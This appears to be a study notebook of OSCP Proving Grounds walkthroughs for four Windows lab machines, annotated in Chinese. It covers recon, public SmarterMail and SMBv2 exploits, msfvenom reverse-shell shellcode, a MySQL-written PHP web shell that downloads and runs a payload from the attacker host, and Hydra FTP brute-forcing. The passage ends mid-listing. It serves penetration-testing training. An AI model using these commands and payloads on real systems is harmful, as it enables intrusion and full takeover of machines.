--- title: '[OSCP, PEN-200] Proving Grounds Practice - Windows' disqus: hackmd --- [OSCP, PEN-200] Proving Grounds Practice - Windows === # Table of Contents [TOC] # Algernon ![image](https://hackmd.io/_uploads/B1WUVl3h1l.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 -p- 192.168.133.65 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 02:26 EDT Warning: 192.168.133.65 giving up on port because retransmission cap hit (6). Stats: 0:05:32 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 44.12% done; ETC: 02:39 (0:07:00 remaining) Nmap scan report for 192.168.133.65 Host is up (0.096s latency). Not shown: 65486 closed tcp ports (reset), 35 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 04-29-20 10:31PM <DIR> ImapRetrieval | 03-21-25 11:25PM <DIR> Logs | 04-29-20 10:31PM <DIR> PopRetrieval |_04-29-20 10:32PM <DIR> Spool 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 9998/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-title: Site doesn't have a title (text/html; charset=utf-8). |_Requested resource was /interface/root |_http-server-header: Microsoft-IIS/10.0 | uptime-agent-info: HTTP/1.1 400 Bad Request\x0D | Content-Type: text/html; charset=us-ascii\x0D | Server: Microsoft-HTTPAPI/2.0\x0D | Date: Sat, 22 Mar 2025 06:42:18 GMT\x0D | Connection: close\x0D | Content-Length: 326\x0D | \x0D | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D | <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D | <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D | <BODY><h2>Bad Request - Invalid Verb</h2>\x0D | <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D |_</BODY></HTML>\x0D 17001/tcp open remoting MS .NET Remoting services 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2025-03-22T06:42:18 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 943.43 seconds ``` > Http, ftp, netbios http://192.168.133.65/\ ![image](https://hackmd.io/_uploads/ryCf-xhhke.png)\ http://192.168.133.65:9998/interface/root#/login\ ![image](https://hackmd.io/_uploads/SJqIbln2kl.png) #### 1.2 Dirb ``` ┌──(chw㉿CHW)-[~] └─$ dirb http://192.168.133.65/ ... ==> DIRECTORY: http://192.168.133.65/aspnet_client/ ... ==> DIRECTORY: http://192.168.133.65/aspnet_client/system_web/ ... ``` > 沒有訊息 ### 2. ftp ``` ┌──(chw㉿CHW)-[~] └─$ ftp anonymous@192.168.133.65 21 Connected to 192.168.133.65. 220 Microsoft FTP Service 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||49762|) 150 Opening ASCII mode data connection. 04-29-20 10:31PM <DIR> ImapRetrieval 03-22-25 01:10AM <DIR> Logs 04-29-20 10:31PM <DIR> PopRetrieval 04-29-20 10:32PM <DIR> Spool ``` > 檔案太多,可以直接 wget 到本機 ``` ┌──(chw㉿CHW)-[~] └─$ wget -r ftp://Anonymous@192.168.133.65 ... ┌──(chw㉿CHW)-[~] └─$ cd 192.168.133.65 ┌──(chw㉿CHW)-[~/192.168.133.65] └─$ ls ImapRetrieval Logs PopRetrieval Spool ┌──(chw㉿CHW)-[~/192.168.133.65] └─$ tree . ├── ImapRetrieval ├── Logs │   ├── 2020.04.29-delivery.log │   ├── 2020.04.29-profiler.log │   ├── 2020.04.29-smtpLog.log │   ├── 2020.04.29-xmppLog.log │   ├── 2020.05.12-administrative.log │   ├── ... │   ├── 2025.01.06-xmppLog.log │   └── 2025.03.22-delivery.log ├── PopRetrieval └── Spool └── Drop ``` ### 3. 分析 log ``` ┌──(chw㉿CHW)-[~/192.168.133.65] └─$ cd Logs ┌──(chw㉿CHW)-[~/192.168.133.65/Logs] └─$ cat * ... 23:26:57.040 xmpp Stopped at 4/29/2020 11:26:57 PM 03:35:45.726 [192.168.118.6] User @ calling create primary system admin, username: admin 03:35:47.054 [192.168.118.6] Webmail Attempting to login user: admin 03:35:47.054 [192.168.118.6] Webmail Login successful: With user admin 03:35:55.820 [192.168.118.6] Webmail Attempting to login user: admin 03:35:55.820 [192.168.118.6] Webmail Login successful: With user admin 03:36:00.195 [192.168.118.6] User admin@ calling set setup wizard settings 03:36:08.242 [192.168.118.6] User admin@ logging out ... ``` > 發現 Webmail user: admin ### 4. searchsploit 因為沒有找到 Smartermail 版本,先瀏覽可能的 exploit 內容 ``` ┌──(chw㉿CHW)-[~/192.168.133.65/Logs] └─$ searchsploit Smartermail --------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------- --------------------------------- SmarterMail 16 - Arbitrary File Upload | multiple/webapps/48580.py SmarterMail 7.1.3876 - Directory Traversal | windows/remote/15048.txt SmarterMail 7.3/7.4 - Multiple Vulnerabilities | asp/webapps/16955.txt SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities | asp/webapps/16975.txt SmarterMail < 7.2.3925 - LDAP Injection | asp/webapps/15189.txt SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting | asp/webapps/15185.txt SmarterMail Build 6985 - Remote Code Execution | windows/remote/49216.py SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting | asp/webapps/31017.php ... ``` > 嘗試 49216 > `SmarterMail .NET Remoting RCE (CVE-2019-7214)` 查看 exploit 使用方法: ``` ┌──(chw㉿CHW)-[~/192.168.133.65/Logs] └─$ searchsploit -x 49216 Exploit: SmarterMail Build 6985 - Remote Code Execution URL: https://www.exploit-db.com/exploits/49216 Path: /usr/share/exploitdb/exploits/windows/remote/49216.py Codes: CVE-2019-7214 Verified: False File Type: Python script, ASCII text executable, with very long lines (4852) # Exploit Title: SmarterMail Build 6985 - Remote Code Execution # Exploit Author: 1F98D # Original Author: Soroush Dalili # Date: 10 May 2020 # Vendor Hompage: re # CVE: CVE-2019-7214 # Tested on: Windows 10 x64 # References: # https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/ # # SmarterMail before build 6985 provides a .NET remoting endpoint # which is vulnerable to a .NET deserialisation attack. # #!/usr/bin/python3 ``` ### 5. Exploit 編輯 exploit ``` ┌──(chw㉿CHW)-[~/192.168.133.65] └─$ cat 49216.py ... import base64 import socket import sys from struct import pack HOST='192.168.133.65' PORT=17001 LHOST='192.168.45.165' LPORT=8888 psh_shell = '$client = ... ┌──(chw㉿CHW)-[~/192.168.133.65] └─$ python3 49216.py ``` (Kali) ``` ┌──(chw㉿CHW)-[~/192.168.133.65] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.165] from (UNKNOWN) [192.168.133.65] 50020 PS C:\Windows\system32> hostname algernon PS C:\Windows\system32> whoami nt authority\system PS C:\Windows\system32> ``` ### ✅ Get Root FLAG > 在 `C:\Users\Administrator\Desktop`找到 Root flag # Squid ![image](https://hackmd.io/_uploads/rk2UCxhnJx.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 -p- 192.168.133.189 ... Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3128/tcp open http-proxy Squid http proxy 4.14 |_http-title: ERROR: The requested URL could not be retrieved 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2025-03-22T09:15:27 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 354.50 seconds ``` > http proxy, RPC ### 2. enum4linux & smbclient ``` ┌──(chw㉿CHW)-[~] └─$ enum4linux -a 192.168.133.189 ┌──(chw㉿CHW)-[~] └─$ smbclient -N -L \\\\192.168.133.189\\ session setup failed: NT_STATUS_ACCESS_DENIED ``` > 皆沒有可用資訊 ### 3. http-proxy scanner 使用 [spose](https://github.com/aancw/spose) 掛上 proxy 再掃描一次 ``` ┌──(chw㉿CHW)-[~/Tools] └─$ git clone https://github.com/aancw/spose.git ┌──(chw㉿CHW)-[~/Tools/spose_http-proxy-scanner] └─$ python3 spose.py --proxy http://192.168.133.189:3128 --target 192.168.133.189 Scanning default common ports Using proxy address http://192.168.133.189:3128 192.168.133.189:3306 seems OPEN 192.168.133.189:8080 seems OPEN ``` > 發現 3306 & 8080 ### 3. Browser http-proxy Browser 掛上題目 http-proxy\ ![image](https://hackmd.io/_uploads/BJz0f-3h1l.png) 瀏覽 192.168.133.189:8080\ ![image](https://hackmd.io/_uploads/Hk1FFW3nJl.png) > Wampserver 3.2.3\ > ![image](https://hackmd.io/_uploads/HJ4_hb33yl.png) ### 4. Dirb with proxy ``` ┌──(chw㉿CHW)-[~] └─$ dirb http://192.168.133.189:8080/ -p 192.168.133.189:3128 ``` > 其實也不用爆破,192.168.133.189:8080 > 有顯示 `phpinfo()` 與 `phpMyadmin` ### 5. phpMyadmin http://192.168.133.189:8080/phpmyadmin/index.php\ ![image](https://hackmd.io/_uploads/SJFkJGhhyx.png) > admin:amdin (失敗) > root:{無密碼} (成功 ?!) 瀏覽資料庫: - user ![image](https://hackmd.io/_uploads/H1xq1z321g.png) 目標: 寫 revershell 進資料庫\ 從 phpinfo() 中可以得知路徑在 `C:\wamp`\ ![image](https://hackmd.io/_uploads/SkvAWzn21e.png) ### 6. Reverse Shell #### 6.1 建立 Reverse Shell file ``` ┌──(chw㉿CHW)-[~] └─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.165 LPORT=8888 -f exe -o chw_windows.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes Saved as: chw_windows.exe ┌──(chw㉿CHW)-[~] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` #### 6.2 Windows 指令注入 mysql ``` SELECT "<?php system('powershell -c \"Invoke-WebRequest -Uri http://192.168.45.165/chw_windows.exe -OutFile C:\\windows\\temp\\rs.exe; Start-Process C:\\windows\\temp\\rs.exe\"'); ?>" INTO OUTFILE "C:/wamp/www/rev.php" ``` ![image](https://hackmd.io/_uploads/B1I7wG2n1g.png)\ (Kali)\ 開啟監聽 port ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.165] from (UNKNOWN) [192.168.133.189] 50486 Microsoft Windows [Version 10.0.17763.2300] (c) 2018 Microsoft Corporation. All rights reserved. C:\wamp\www> ``` 瀏覽 http://192.168.133.189:8080/rev.php ### 7. 取得 reverse shell ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.165] from (UNKNOWN) [192.168.133.189] 50486 Microsoft Windows [Version 10.0.17763.2300] (c) 2018 Microsoft Corporation. All rights reserved. C:\wamp\www>hostname hostname SQUID C:\wamp\www>whoami whoami nt authority\system ``` >[!Note] >最高權限: `nt authority\system` ?! \ >這應該不是正規解,還需要取得 User flag ### ✅ Get User Flag > 在 `C:\`找到 User flag ### ✅ Get Root FLAG > 在 `C:\Users\Administrator\Desktop`找到 Root flag # Internal ![image](https://hackmd.io/_uploads/SyutNm3hyl.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 -p- 192.168.133.40 ... PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.0.6001 (17714650) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 2460/tcp filtered ms-theater 3389/tcp open ms-wbt-server Microsoft Terminal Service | rdp-ntlm-info: | Target_Name: INTERNAL | NetBIOS_Domain_Name: INTERNAL | NetBIOS_Computer_Name: INTERNAL | DNS_Domain_Name: internal | DNS_Computer_Name: internal | Product_Version: 6.0.6001 |_ System_Time: 2025-03-22T12:12:08+00:00 | ssl-cert: Subject: commonName=internal | Not valid before: 2025-01-05T19:52:51 |_Not valid after: 2025-07-07T19:52:51 |_ssl-date: 2025-03-22T12:12:16+00:00; 0s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Service Unavailable |_http-server-header: Microsoft-HTTPAPI/2.0 6543/tcp filtered mythtv 13216/tcp filtered bcslogc 13872/tcp filtered unknown 14657/tcp filtered unknown 15075/tcp filtered unknown 26509/tcp filtered unknown 28182/tcp filtered unknown 33705/tcp filtered unknown 37351/tcp filtered unknown 37998/tcp filtered unknown 43864/tcp filtered unknown 44421/tcp filtered unknown 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 51714/tcp filtered unknown 52362/tcp filtered unknown 58509/tcp filtered unknown 61842/tcp filtered unknown 63645/tcp filtered unknown 64131/tcp filtered unknown Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2 Host script results: | smb2-time: | date: 2025-03-22T12:12:08 |_ start_date: 2025-02-20T21:30:47 | smb-os-discovery: | OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: internal | NetBIOS computer name: INTERNAL\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2025-03-22T05:12:08-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s | smb2-security-mode: | 2:0:2: |_ Message signing enabled but not required |_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:fb:ab (VMware) ... ``` > DNS, SMB, RPC, RDP #### 1.2 enum4linux & smbclient ``` ┌──(chw㉿CHW)-[~] └─$ enum4linux -a 192.168.133.40 ... ===========================( Enumerating Workgroup/Domain on 192.168.133.40 )=========================== [+] Got domain/workgroup name: WORKGROUP ===============================( Nbtstat Information for 192.168.133.40 )=============================== Looking up status of 192.168.133.40 INTERNAL <00> - B <ACTIVE> Workstation Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name INTERNAL <20> - B <ACTIVE> File Server Service MAC Address = 00-50-56-AB-FB-AB ... ================================( Share Enumeration on 192.168.133.40 )================================ do_connect: Connection to 192.168.133.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 192.168.133.40 ┌──(chw㉿CHW)-[~] └─$ smbclient -L //192.168.133.40/ -N Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.133.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌──(chw㉿CHW)-[~] └─$ rpcclient -U '' -N 192.168.133.40 rpcclient $> enumdomusers do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED rpcclient $> netshareenum do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED rpcclient $> lsaquery do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED rpcclient $> getdompwinfo do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED ``` > 皆沒有可用資訊 ### 1.3 DNS 將 domain 加入 `/etc/host` ``` ┌──(chw㉿CHW)-[~] └─$ cat /etc/hosts 192.168.133.40 Internal ... ┌──(chw㉿CHW)-[~] └─$ ping Internal PING Internal (192.168.133.40) 56(84) bytes of data. 64 bytes from Internal (192.168.133.40): icmp_seq=1 ttl=125 time=107 ms 64 bytes from Internal (192.168.133.40): icmp_seq=2 ttl=125 time=140 ms ``` ### 1.4 Nmap script 到目前還沒有找到明顯可以利用的點\ 利用 nmap smb-vuln* 的 NSE script 掃描 SMB port ``` ┌──(chw㉿CHW)-[~] └─$ nmap -p 445 --script smb-vuln* 192.168.133.40 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 08:43 EDT Nmap scan report for Internal (192.168.133.40) Host is up (0.13s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF | smb-vuln-cve2009-3103: | VULNERABLE: | SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) | State: VULNERABLE | IDs: CVE:CVE-2009-3103 | Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, | Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a | denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE | PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, | aka "SMBv2 Negotiation Vulnerability." | | Disclosure date: 2009-09-08 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 |_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103 Nmap done: 1 IP address (1 host up) scanned in 25.64 seconds ``` ### 2. Exploit DB 透過 [exploit-db](https://www.exploit-db.com/) 搜尋 exploit ![image](https://hackmd.io/_uploads/S1NYoBn31e.png) ### 3. 產出 meterpreter 因為 payload 是用 hardcode 寫死的,需要生成 shell code ``` ┌──(chw㉿CHW)-[~] └─$ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.178 LPORT=8888 EXITFUNC=thread -f c [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 375 bytes Final size of c file: 1605 bytes unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89" "\xe5\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b" "\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" "\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01" "\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b" "\x58\x20\x50\x01\xd3\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01" "\xd6\x31\xff\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x38\xe0\x75" "\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01" "\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01" "\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58" "\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00" "\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8" "\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" "\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2d\xb2\x68\x02\x00" "\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74" "\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67" "\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f" "\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10" "\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53" "\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8" "\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b" "\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e" "\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff" "\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xe0\x1d\x2a\x0a\x68" "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; ``` ### 4. 編輯並執行 exploit 將 shell 取代成上述生成的 shell code ``` ┌──(chw㉿CHW)-[~] └─$ python2 Internal.py 192.168.133.40 Password for [WORKGROUP\Administrator]: Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.178] from (UNKNOWN) [192.168.133.40] 49159 ls ``` >[!Important] > `nc` 無法處理 Windows CMD 輸出的流控制(stdin/stdout/stderr),所以 馬上被 cmd.exe 結束 nc 一連線就會斷,改用 `windows/shell/reverse_tcp` ``` ┌──(chw㉿CHW)-[~] └─$ msfconsole ... msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.45.178 LHOST => 192.168.45.178 msf6 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.45.178:8888 ``` 重新執行 `Internal.py` ### 5. 取得 Shell ``` Shell Banner: Microsoft Windows [Version 6.0.6001] ----- C:\Windows\system32>hostname hostname internal C:\Windows\system32>whoami whoami nt authority\system ``` ### ✅ Get Root FLAG > 在 `C:\Users\Administrator\Desktop` 找到 Root flag # Intermediate # AuthBy ![image](https://hackmd.io/_uploads/Bys4Z76nye.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 -p- 192.168.124.46 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 11:51 EDT Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 75.00% done; ETC: 11:54 (0:00:06 remaining) Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 100.00% done; ETC: 11:54 (0:00:00 remaining) Nmap scan report for 192.168.124.46 Host is up (0.11s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp zFTPServer 6.0 build 2011-10-17 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | total 9680 | ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe | ---------- 1 root root 25 Feb 10 2011 UninstallService.bat | ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe | ---------- 1 root root 17 Aug 13 2011 StopService.bat | ---------- 1 root root 18 Aug 13 2011 StartService.bat | ---------- 1 root root 8736 Nov 09 2011 Settings.ini | dr-xr-xr-x 1 root root 512 Mar 22 22:54 log | ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm | ---------- 1 root root 23 Feb 10 2011 InstallService.bat | dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions | dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates |_dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts 242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8) |_http-title: 401 Authorization Required |_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8 | http-auth: | HTTP/1.1 401 Authorization Required\x0D |_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem! 3145/tcp open zftp-admin zFTPServer admin 3389/tcp open ms-wbt-server Microsoft Terminal Service |_ssl-date: 2025-03-22T15:54:35+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=LIVDA | Not valid before: 2024-08-02T13:17:54 |_Not valid after: 2025-02-01T13:17:54 | rdp-ntlm-info: | Target_Name: LIVDA | NetBIOS_Domain_Name: LIVDA | NetBIOS_Computer_Name: LIVDA | DNS_Domain_Name: LIVDA | DNS_Computer_Name: LIVDA | Product_Version: 6.0.6001 |_ System_Time: 2025-03-22T15:54:30+00:00 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` > ftp (Anonymous), FTPServer, http, RDP 瀏覽 192.168.124.46:242\ ![image](https://hackmd.io/_uploads/Skp30U2nkx.png) #### 1.2 ftp ``` ┌──(chw㉿CHW)-[~] └─$ ftp Anonymous@192.168.124.46 Connected to 192.168.124.46 220 zFTPServer v6.0, build 2011-10-17 15:25 ready. 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||2049|) 150 Opening connection for /bin/ls. total 9680 ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe ---------- 1 root root 25 Feb 10 2011 UninstallService.bat ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe ---------- 1 root root 17 Aug 13 2011 StopService.bat ---------- 1 root root 18 Aug 13 2011 StartService.bat ---------- 1 root root 8736 Nov 09 2011 Settings.ini dr-xr-xr-x 1 root root 512 Mar 22 22:54 log ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm ---------- 1 root root 23 Feb 10 2011 InstallService.bat dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates dr-xr-xr-x 1 root root 512 Aug 03 2024 accounts 226 Closing data connection. ``` wget 到本機 ``` ┌──(chw㉿CHW)-[~] └─$ wget -r ftp://Anonymous@192.168.124.46 ... No such file ‘acc[anonymous].uac’. --2025-03-22 12:13:55-- ftp://Anonymous@192.168.124.46/accounts/acc%5Badmin%5D.uac => ‘192.168.124.46/accounts/acc[admin].uac’ ==> CWD not required. ==> PASV ... done. ==> RETR acc[admin].uac ... No such file ‘acc[admin].uac’. ``` > 失敗 >[!Important] > FTP Server(特別是 Windows FTP server)不允許 PASV 模式搭配 filename 中包含特殊字元(如中括號 [])或大小寫敏感\ > >使用 `lftp` ``` ┌──(chw㉿CHW)-[~] └─$ lftp -u anonymous, ftp://192.168.124.46 -e "mirror --verbose --parallel=5 --continue --target-directory ./ftp; quit" ``` > 也失敗,檢查後是沒有權限 ### 2. Hydra 使用 Hydra 爆破 ftp ``` ┌──(chw㉿CHW)-[~] └─$ hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.124.46 ftp Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-23 02:10:52 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task [DATA] attacking ftp://192.168.124.46:21/ [21][ftp] host: 192.168.124.46 login: admin password: admin [21][ftp] host: 192.168.124.46 login: anonymous password: anonymous [21][ftp] host: 192.168.124.46 login: Admin password: admin 1 of 1 target successfully completed, 3 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-23 02:11:10 ``` Admin 連線 ftp ``` ┌──(chw㉿CHW)-[~] └─$ ftp admin@192.168.124.46 Connected to 192.168.124.46. 220 zFTPServer v6.0, build 2011-10-17 15:25 ready. 331 User name received, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 229 Entering Extended Passive Mode (|||2054|) 150 Opening connection for /bin/ls. total 3 -r--r--r-- 1 root root 76 Nov 08 2011 index.php 